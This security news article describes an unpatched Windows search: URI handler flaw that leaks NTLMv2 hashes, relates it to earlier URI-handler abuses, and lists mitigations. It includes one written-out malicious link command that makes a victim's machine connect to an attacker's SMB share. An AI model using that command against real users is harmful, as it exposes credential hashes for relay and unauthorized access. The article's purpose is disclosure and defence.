Unpatched Windows Search URI Vulnerability Exposes NTLMv2 Hashes to Attackers
Cybersecurity researchers have identified a critical vulnerability within the Windows operating system’s search functionality that remains unpatched, potentially allowing attackers to capture users’ NTLMv2 hashes. This flaw, akin to the previously addressed CVE-2026-33829, which involved the Windows Snipping Tool’s ms-screensketch: URI handler, now affects the search: URI handler.
The NTLMv2 hash is a cryptographic representation of a user’s password, utilized for authentication within Windows environments. If an attacker gains access to this hash, they can potentially authenticate as the user, leading to unauthorized access and potential data breaches.
Understanding the Vulnerability
The core of this issue lies in the search: URI handler’s handling of specific parameters. By crafting a malicious link that includes the crumb=location: parameter pointing to an attacker’s server, an attacker can trick a user’s system into initiating an SMB (Server Message Block) connection to the specified server. This connection attempt inadvertently transmits the user’s NTLMv2 hash to the attacker.
For instance, a malicious link might appear as follows:
“`
start search:query=test&crumb=location:\\10.0.1.100\share
“`
When a user clicks on such a link, their system attempts to access the specified network location, thereby exposing their NTLMv2 hash.
Historical Context and Similar Vulnerabilities
This vulnerability mirrors the previously identified CVE-2026-33829, which was patched by Microsoft in April 2026. In that instance, the Snipping Tool’s URI handler accepted a filePath parameter without proper validation, leading to similar NTLMv2 hash exposure risks. Despite the similarities, Microsoft has declined to address the current search: URI handler issue, stating that only vulnerabilities rated as Important or Critical meet their criteria for servicing.
The exploitation of Windows URI handlers is not a new phenomenon. In July 2023, attackers were found abusing the search-ms: URI protocol handler to download and execute remote access trojans like AsyncRAT and Remcos RAT. These attacks involved directing users to malicious websites that exploited the search-ms functionality using embedded JavaScript, leading to the execution of malicious code on the victim’s system.
Potential Risks and Implications
The exposure of NTLMv2 hashes poses significant security risks. Attackers can use these hashes to perform relay attacks, allowing them to authenticate as the user and gain unauthorized access to network resources. This can lead to data theft, system compromise, and further propagation of malicious activities within an organization’s network.
Given the unpatched nature of this vulnerability, systems remain susceptible to such attacks, emphasizing the need for immediate mitigation strategies.
Mitigation Strategies
In the absence of an official patch from Microsoft, organizations and users are advised to implement the following measures to mitigate the risk associated with this vulnerability:
1. Block Outbound SMB Traffic: Configure firewalls to block outbound SMB traffic on ports TCP/445 and TCP/139 for hosts that do not require it. This prevents the system from initiating unintended SMB connections to external servers.
2. Enforce SMB Signing: Implement SMB signing to ensure that all SMB communications are authenticated and integrity-checked. This measure helps prevent attackers from relaying captured NTLMv2 hashes to gain unauthorized access.
3. Disable NTLM Authentication: Where feasible, disable NTLM authentication in favor of more secure authentication protocols. This reduces the risk associated with NTLMv2 hash exposure.
4. User Education: Educate users about the risks of clicking on unsolicited links, especially those that prompt unexpected actions or access to network resources.
5. Regular System Updates: While this specific issue remains unpatched, ensure that all other system components are up-to-date with the latest security patches to minimize overall vulnerability exposure.
Conclusion
The discovery of this unpatched vulnerability within the Windows search: URI handler underscores the ongoing challenges in securing complex operating systems. While Microsoft has opted not to address this specific issue, users and organizations must proactively implement mitigation strategies to protect against potential exploitation. Staying informed about emerging threats and maintaining robust security practices are essential in safeguarding sensitive information and maintaining system integrity.
